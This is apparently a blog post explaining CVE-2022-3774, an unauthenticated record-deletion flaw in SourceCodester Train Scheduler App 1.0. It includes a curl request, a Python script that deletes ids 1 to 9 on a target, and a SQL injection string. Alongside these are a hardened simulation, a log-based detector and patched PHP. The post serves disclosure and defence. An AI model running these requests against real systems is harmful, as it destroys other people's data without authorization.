In October 2022, a security vulnerability (CVE-2022-3774, also tracked as VDB-212504) was disclosed in the SourceCodester Train Scheduler App version 1.0. The flaw sits in the delete action of /train_scheduler_app/?action=delete and is classified as Improper Control of Resource Identifiers: a remote attacker can delete records they should have no control over simply by changing the id parameter in a request.
This post breaks down why this vulnerability matters, how an attack works, provides easy-to-follow exploit snippets, and lists key references. We walk through the mechanics step by step, so you can follow how real-world exploitation happens even if you are not a security specialist.
What’s Actually Wrong?
The delete action inside the Train Scheduler app uses the URL parameter id to identify which record to delete. The code does not check who is making the request or whether that user is allowed to delete the record named by the id. Anyone who can reach the endpoint can therefore supply any record id, including records that are not theirs.
The problematic endpoint is
/train_scheduler_app/?action=delete&id=[number]
Here’s what an attacker might send to exploit this bug
GET /train_scheduler_app/?action=delete&id=2 HTTP/1.1
Host: vulnerable-site.com
Cookie: PHPSESSID=attacker_session
Or using curl from the command line
curl "http://vulnerable-site.com/train_scheduler_app/?action=delete&id=2"
Inspecting the Vulnerable Code (Pseudo-code)
The advisory does not quote the affected code. Exploit writers have reported that the logic looks roughly like the following (pseudo-code reconstructed from those reports, not the app's actual source):
// Reported logic (pseudo-code): the id comes straight from the query string
if ($_GET['action'] == 'delete' && isset($_GET['id'])) {
    $id = $_GET['id'];  // no authentication, no ownership check
    // SQL: DELETE FROM schedules WHERE id = $id  (value interpolated, not bound)
    $pdo->query("DELETE FROM schedules WHERE id = '$id'");
    header('Location: /train_scheduler_app/?action=list');
}
Problems
- No authentication or session check: the request is not tied to any logged-in user.
- No filtering of which IDs the caller may delete: any existing id is accepted.
- Possibly even SQL injection, because $id is interpolated into the query string (not confirmed for this app, but the pattern is dangerous).
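To make the flaw concrete, here is an added Python simulation (not code from the Train Scheduler App or from the advisory) of the reported delete logic beside a hardened version, run against an in-memory SQLite table. The table layout (a schedules table with an owner_id column), the user ids, and the session/method parameters are assumptions made for the example; the real app's schema is not given in the advisory.

```python
import sqlite3


def make_db():
    """Constructed sample data (assumed schema, not the real app's): each schedule has an owner."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE schedules (id INTEGER PRIMARY KEY, owner_id INTEGER, train TEXT)")
    conn.executemany(
        "INSERT INTO schedules VALUES (?, ?, ?)",
        [(1, 100, "Express 07:00"), (2, 200, "Local 07:30"), (3, 200, "Local 08:00")],
    )
    conn.commit()
    return conn


def remaining_ids(conn):
    """Ids still present, in order, so the effect of each request is visible."""
    return [row[0] for row in conn.execute("SELECT id FROM schedules ORDER BY id")]


def delete_vulnerable(conn, params):
    """Mirrors the reported logic: any caller, any id, value interpolated into the SQL."""
    if params.get("action") == "delete" and "id" in params:
        # Same shape as the pseudo-code's $pdo->query("... WHERE id = '$id'")
        conn.execute(f"DELETE FROM schedules WHERE id = '{params['id']}'")
        conn.commit()
    return remaining_ids(conn)


def delete_fixed(conn, session, method, params):
    """Hardened handler: POST only, logged-in user, integer id, ownership enforced in the query.

    Returns True only if exactly one row owned by the session user was deleted.
    """
    if method != "POST" or not session.get("user_id"):
        return False  # anonymous or non-POST requests never reach the database
    try:
        record_id = int(params.get("id", ""))
    except ValueError:
        return False  # non-numeric ids (including injection attempts) are rejected
    cur = conn.execute(
        "DELETE FROM schedules WHERE id = ? AND owner_id = ?",
        (record_id, session["user_id"]),
    )
    conn.commit()
    return cur.rowcount == 1
```

With delete_vulnerable, an anonymous request with id=2 removes another user's row, and an id of 1' OR '1'='1 empties the table, which is exactly why the post flags the interpolated query as dangerous. With delete_fixed, the same inputs are refused: the ownership condition lives in the WHERE clause, so a forged id for someone else's record simply matches zero rows.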
How an Attack Works
1. The attacker finds or guesses the id value of a schedule record.
2. The attacker sends a crafted GET request to /train_scheduler_app/?action=delete&id=[victim_id], and the record is deleted without any authorization check.
You can perform this with basic tools, but below is a Python script demonstrating an automated attack that simply walks through small integer ids:
import requests

# Base URL of the vulnerable delete endpoint; the record id is appended per request
target = "http://vulnerable-site.com/train_scheduler_app/?action=delete&id="

for record_id in range(1, 10):  # Try deleting IDs 1-9
    url = target + str(record_id)
    response = requests.get(url, timeout=10)
    print(f"Tried deleting id={record_id}, HTTP status: {response.status_code}")
Warning: Don’t use this unless you have permission. This code is for education and testing on your own systems.
Responsible Disclosure & Vendor Status
- VulDB Advisory VDB-212504
- CVE Page for CVE-2022-3774
As of last update, no public patch or fix is listed for version 1.0. If you run this app, disable the delete endpoint or restrict it to authenticated administrators, and add proper access controls (authentication plus an ownership check on the id) before exposing it again.
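If you cannot patch right away, you can at least look for the enumeration pattern produced by the exploit script in your web server logs. The following Python is an added example, not part of the original post or of the app: the access log lines are constructed in combined-log format, and the threshold of three distinct ids per client is an arbitrary choice for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access log lines (not from any real server).
# The first client walks action=delete&id=1,2,3 via GET, which is what the exploit script does.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Oct/2022:16:15:01 +0000] "GET /train_scheduler_app/?action=list HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Oct/2022:16:15:02 +0000] "GET /train_scheduler_app/?action=delete&id=1 HTTP/1.1" 302 0 "-" "python-requests/2.28.1"
203.0.113.7 - - [31/Oct/2022:16:15:02 +0000] "GET /train_scheduler_app/?action=delete&id=2 HTTP/1.1" 302 0 "-" "python-requests/2.28.1"
203.0.113.7 - - [31/Oct/2022:16:15:03 +0000] "GET /train_scheduler_app/?action=delete&id=3 HTTP/1.1" 302 0 "-" "python-requests/2.28.1"
198.51.100.9 - - [31/Oct/2022:16:20:44 +0000] "POST /train_scheduler_app/?action=delete HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Split one combined-log line into ip, timestamp, method, path, parsed query and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec.pop("target"))
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def find_delete_enumeration(log_text, threshold=3):
    """Map client ip -> list of ids for clients that issued GET action=delete requests
    with at least `threshold` distinct ids. The threshold is an arbitrary example value."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        q = rec["query"]
        if rec["method"] == "GET" and q.get("action") == ["delete"] and "id" in q:
            hits[rec["ip"]].append(q["id"][0])
    return {ip: ids for ip, ids in hits.items() if len(set(ids)) >= threshold}


if __name__ == "__main__":
    for ip, ids in find_delete_enumeration(SAMPLE_LOG).items():
        print(f"{ip} deleted ids {', '.join(ids)} via GET")
```

A single GET delete is not proof of abuse on its own, since the unpatched app itself uses GET for this action; the signal is one client hitting many distinct ids in quick succession, typically from a scripting user agent. Tune the threshold to your traffic before alerting on it.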
Example (Very Simplified PHP)
// Only delete if logged in, the user owns the record, and the request is a POST
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST' &&
    !empty($_SESSION['user_id']) &&
    isset($_POST['id']) &&
    user_owns_record($_SESSION['user_id'], (int) $_POST['id'])) {
    // Prepared statement: the id is bound as a parameter, never interpolated into the SQL
    $stmt = $pdo->prepare("DELETE FROM schedules WHERE id = ?");
    $stmt->execute([(int) $_POST['id']]);
}
Conclusion and Takeaways
- CVE-2022-3774 (VDB-212504) is trivial to exploit: a single GET request with a chosen id parameter deletes an arbitrary train schedule, and the reported logic performs no authentication or ownership check.
- If you run SourceCodester Train Scheduler App 1.0, mitigate immediately: restrict public access to the endpoint and apply a custom patch if needed.
- Web app devs: *Never* trust user input for sensitive actions. Validate everything and follow least-privilege.
References
- VulDB Advisory VDB-212504
- CVE Details: CVE-2022-3774
- SourceCodester Download Page (archived)
> Stay safe and always validate access before destructive actions!
Timeline
Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 16:27:00 UTC